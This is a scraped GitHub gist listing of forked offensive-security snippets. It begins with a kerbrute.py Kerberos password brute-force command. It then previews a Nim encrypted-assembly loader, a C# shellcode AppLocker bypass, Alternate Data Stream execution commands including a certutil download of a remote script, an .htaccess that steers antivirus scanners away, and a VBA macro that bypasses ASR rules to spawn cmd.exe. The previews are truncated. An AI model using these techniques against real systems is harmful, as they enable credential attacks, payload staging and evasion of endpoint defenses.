With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Ceramicskate0 ceramicskate0
ceramicskate0
/ rsrcDecryptAssembly.nim
Created
January 7, 2022 03:36
— forked from ChoiSG/rsrcDecryptAssembly.nim
embed .net, decrypt, load and execute in nim poc
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import nimcrypto | |
| import winim/clr except `[]` # https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/ <-- thank you so much, 2 hours googling I almost went crazy | |
| #[ | |
| All credit goes to @byt3bl33d3r (OffensiveNim) and @s3cur3th1ssh1t | |
| nimble install winim nimcrypto zippy | |
| nim c -d:danger -d:strip --opt:size rsrcDecryptAssembly.nim | |
| slurp = "staticRead" will read the file and store it in the variable (.rdata) on compile time. |
ceramicskate0
/ hookdetector.vba
Created
December 8, 2020 02:36
— forked from X-C3LL/hookdetector.vba
VBA Macro to detect EDR Hooks (It's just a PoC)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr | |
| Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
| Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long) | |
| 'VBA Macro that detects hooks made by EDRs | |
| 'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa) | |
| Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer | |
| Dim address As LongPtr |
ceramicskate0
/ kerberos_attacks_cheatsheet.md
Created
July 18, 2020 15:09
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
ceramicskate0
/ Shellcode.cs
Created
March 23, 2020 01:32
— forked from netbiosX/Shellcode.cs
C# file that contains shellcode and bypasses AppLocker via Assembly Load
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
ceramicskate0
/ bin2sc.py
Created
March 23, 2020 01:14
— forked from superkojiman/bin2sc.py
Convert bin to shellcode.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys | |
| if __name__ == "__main__": | |
| if len(sys.argv) < 2: | |
| print "usage: %s file.bin\n" % (sys.argv[0],) | |
| sys.exit(0) | |
| shellcode = "\"" | |
| ctr = 1 | |
| maxlen = 15 |
ceramicskate0
/ Exe_ADS_Methods.txt
Created
March 17, 2020 00:41
— forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ###Add content to ADS### | |
| type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
| extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
| findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
| certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
| makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
| print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
| reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
| regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
| expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat |
ceramicskate0
/ transformFile.py
Created
February 23, 2020 15:45
— forked from Arno0x/transformFile.py
Performs multiple useful transformation on files
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # -*- coding: utf8 -*- | |
| # | |
| # Author: Arno0x0x, Twitter: @Arno0x0x | |
| # | |
| import argparse | |
| from Crypto.Cipher import AES | |
| import pyscrypt | |
| from base64 import b64encode |
ceramicskate0
/ .htaccess
Created
July 23, 2019 16:33
— forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
| # | |
| # Note this version requires Apache 2.4+ | |
| # | |
| Define REDIR_TARGET |DESTINATIONURL| | |
| RewriteEngine On | |
| RewriteOptions Inherit | |
ceramicskate0
/ TestAssembly.cs
Created
June 17, 2019 16:01
— forked from Arno0x/TestAssembly.cs
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| ================================ Compile as a .Net DLL ============================== | |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs | |
| */ | |
| using System.Windows.Forms; | |
| namespace TestNamespace |
ceramicskate0
/ ASR Rules Bypass.vba
Created
May 12, 2019 00:16
— forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
NewerOlder